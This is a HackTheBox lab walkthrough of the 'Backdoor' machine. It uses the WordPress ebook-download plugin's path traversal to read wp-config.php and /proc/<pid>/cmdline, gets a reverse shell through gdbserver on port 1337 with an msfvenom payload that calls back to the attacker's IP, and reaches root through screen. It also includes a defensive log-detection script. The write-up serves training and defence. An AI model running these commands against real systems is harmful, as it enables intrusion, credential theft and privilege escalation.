HackTheBox Target Machine Backdoor: Process Record

0x01 Introduction

Target machine IP: 10.10.11.125.
Attacking machine IP: 10.10.16.21 (Mac M1).

0x02 Simple Information Gathering

An fscan port scan only found ports 22 and 80. A full nmap scan additionally found port 1337, but at this stage it was unclear what that port was used for.

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125

Visiting http://10.10.11.125/ shows a WordPress site. The WordPress version is 5.8.1, and the backend login page is http://backdoor.htb/wp-login.php.

A wpscan run did not turn up anything useful.

WordPress keeps plugins under wp-content/plugins. Visiting http://10.10.11.125/wp-content/plugins/ reveals a php file (hello.php) and an ebook-download directory. hello.php was initially suspected to be a malicious file, but on inspection it is not a Trojan. Since ebook-download sits in the plugins directory and exposes a readme.txt, it is confirmed to be a plugin.

0x03 Exploiting Vulnerabilities

Searching https://www.exploit-db.com/ for this plugin turns up a directory traversal vulnerability.

The proof of concept (PoC) is as follows:

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
 
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

Download wp-config.php through the traversal:

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

This file contains the database username and password. Trying those credentials against the WordPress backend login was unsuccessful.

At this point there were no further ideas. After reading a wp (writeup), it turned out that port 1337 is running gdbserver, which can be exploited directly for remote code execution (RCE). For penetration testing against gdbserver, see https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver. The gdbserver exploit script is at https://www.exploit-db.com/exploits/50539.

Exploitation process:

  1. Download the exploit to the local machine.
  2. Generate shellcode with msfvenom:
     msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
  3. Start a local listener:
     nc -lvp 1234
  4. Run the exploit:
     python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin

Upgrade to an interactive shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

Then make it a fully interactive TTY:

script /dev/null -c bash
ctrl+z                (suspend the reverse shell)
stty raw -echo; fg    (on the local terminal, then bring the shell back to the foreground)
reset                 (answer xterm-256color when prompted for the terminal type)

Another way to discover the services running on the target is the /proc/<pid>/cmdline file, read through the same arbitrary file read vulnerability. In /proc, the directories with numeric names correspond to running processes, and each directory name is that process's PID.

Burp Suite can then be used to iterate through PID values and enumerate the services running on the target server.
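From the defender's side, the same traversal and PID-enumeration traffic is easy to spot in web server access logs. As an added example that is not part of the original writeup, the Python below classifies constructed Apache-style log lines: it flags any ../ in this plugin's ebookdownloadurl parameter and separately flags reads of /proc/<pid>/cmdline, where repeated hits from one source are the PID-iteration signature.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the writeup).
SAMPLE_LOG = """\
10.10.16.21 - - [10/Dec/2021:09:12:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3411 "-" "Mozilla/5.0"
10.10.16.21 - - [10/Dec/2021:09:12:05 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F851%2Fcmdline HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.10.16.21 - - [10/Dec/2021:09:12:06 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/852/cmdline HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.0.2.7 - - [10/Dec/2021:09:13:10 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=uploads/brochure.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
192.0.2.8 - - [10/Dec/2021:09:14:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"
PROC_CMDLINE_RE = re.compile(r"/proc/(\d+|self)/cmdline$")


def classify(line):
    """Return (ip, label, decoded value) for a suspicious line, else None.
    'proc-enum' marks /proc/<pid>/cmdline reads (service discovery);
    'traversal' marks any other ../ in the ebookdownloadurl parameter."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != PLUGIN_PATH:
        return None
    raw = parse_qs(url.query).get("ebookdownloadurl", [""])[0]
    # parse_qs already decoded once; unquote again so double-encoded ../ also normalises.
    value = unquote(raw)
    if PROC_CMDLINE_RE.search(value):
        return (m.group("ip"), "proc-enum", value)
    if "../" in value or "..\\" in value:
        return (m.group("ip"), "traversal", value)
    return None


def summarize(log_text):
    """Count findings per (source ip, label) so repeated proc-enum hits stand out."""
    counts = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            key = (hit[0], hit[1])
            counts[key] = counts.get(key, 0) + 1
    return counts
```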

0x04 Privilege Escalation

Search for root-owned files with the SUID bit set. One of them is /usr/bin/screen.

find / -perm -4000 -type f 2>/dev/null

Attach to root's existing screen session:

screen -x root/root

0x05 Conclusion

  1. Learned how to chain an arbitrary file read vulnerability with /proc to discover the services running on a target, and how screen can be used for privilege escalation.

References:

https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174
